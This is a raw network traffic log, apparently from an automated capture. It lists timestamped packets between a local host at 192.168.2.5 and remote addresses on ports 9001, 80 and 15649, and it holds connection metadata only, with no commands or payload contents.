Dec 24, 2023 10:44:32.118165970 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118189096 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118227005 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118335962 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118376017 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118500948 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118542910 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118552923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118590117 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118607998 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118647099 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118689060 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118729115 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118777990 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118789911 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118830919 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118854046 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118915081 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118949890 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118953943 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.119004965 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.119046926 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.119054079 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.119112015 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.119149923 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.119159937 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.119292974 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.119329929 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.119402885 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.119424105 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.119462967 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.119508028 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.120513916 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.120609045 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.134610891 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.162657976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.162714958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.162772894 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.171096087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.171164036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.171209097 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.188194990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.188242912 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.188283920 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.205220938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.205440998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.205497026 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.218149900 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:32.218219042 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:32.222145081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.222220898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.222265005 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.239155054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.239228010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.239274025 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.256226063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.256258965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.256326914 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.273107052 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.273152113 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.273189068 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.290057898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.290117025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.290170908 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.299300909 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:32.299357891 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:32.307183027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.307220936 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.307265043 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.371622086 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.371675968 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.371706963 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.371721029 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.371750116 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.371781111 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.371817112 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.371860981 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.371884108 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.371931076 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.371944904 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.371988058 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372000933 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372039080 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372040987 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372090101 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372137070 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372178078 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372206926 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372247934 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372294903 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372323036 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372328997 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372368097 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372368097 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372406960 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372483015 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372520924 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372616053 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372656107 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372678995 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372718096 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372765064 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372812033 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372812986 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372852087 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372852087 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372883081 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372895956 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372921944 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.372963905 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.372982979 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373004913 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373014927 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373045921 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373076916 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373084068 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373117924 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373153925 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373193026 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373210907 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373244047 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373255014 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373279095 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373281956 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373317003 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373353004 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373397112 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373404980 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373447895 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373456001 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373493910 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373519897 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373537064 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.373569012 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.373583078 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375335932 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375349998 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375360966 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375375032 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375386953 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375391960 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375400066 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375412941 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375423908 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375435114 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375454903 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375471115 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375479937 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375483036 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375510931 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375516891 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375526905 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375530005 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375557899 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375560999 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375570059 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375574112 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375586033 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375595093 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375597954 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375612020 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375617981 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375624895 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375637054 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375639915 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375650883 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375663996 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375669003 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375677109 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375688076 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375690937 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375703096 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375705957 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375715971 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375727892 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375734091 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375741005 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375760078 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375761032 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375772953 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375775099 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375787020 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375802040 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.375802994 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375819921 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.375840902 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.376358032 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.376403093 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.376446962 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.376462936 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.376482010 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.376483917 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.376497984 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.376522064 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377271891 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377320051 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377326965 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377365112 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377379894 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377424955 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377428055 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377469063 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377469063 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377511024 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377511978 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377554893 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377580881 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377621889 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377646923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377662897 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377688885 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377712965 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377794027 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377837896 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377842903 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377886057 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377908945 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377954006 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.377963066 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.377981901 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378010035 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378031015 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378052950 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378084898 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378097057 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378127098 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378164053 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378206015 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378216028 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378298998 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378341913 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378401995 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378468037 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378509045 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378528118 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378616095 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378652096 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378679037 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378729105 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378778934 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378823042 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378859997 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378892899 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.378921986 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.378983974 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379000902 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379026890 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379076958 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379120111 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379122972 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379178047 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379220009 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379371881 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379496098 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379539013 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379551888 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379621029 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379657984 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379661083 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379709959 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379753113 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379764080 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379807949 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379853964 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379856110 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379908085 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379950047 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.379976034 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.379997969 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380036116 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380067110 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380153894 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380197048 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380244970 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380274057 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380317926 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380337954 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380394936 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380438089 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380445004 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380516052 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380563021 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380600929 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380633116 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380673885 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380691051 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380768061 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380791903 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380811930 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380860090 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380883932 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380902052 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.380965948 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.380999088 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.381004095 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.381057978 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.381115913 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.381117105 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.381166935 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.381215096 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.381217957 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.383833885 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.384052992 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.395709038 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.395766973 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.396949053 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.396996975 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397011995 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397047997 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397077084 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397114038 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397142887 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397182941 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397200108 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397237062 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397264004 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397303104 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397342920 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397387028 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397416115 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397460938 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397479057 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397517920 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397538900 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397578001 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397608042 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397643089 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397680044 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397717953 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.397814989 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.397857904 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.400317907 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.422929049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.422983885 CET	80	49724	5.42.65.125	192.168.2.5
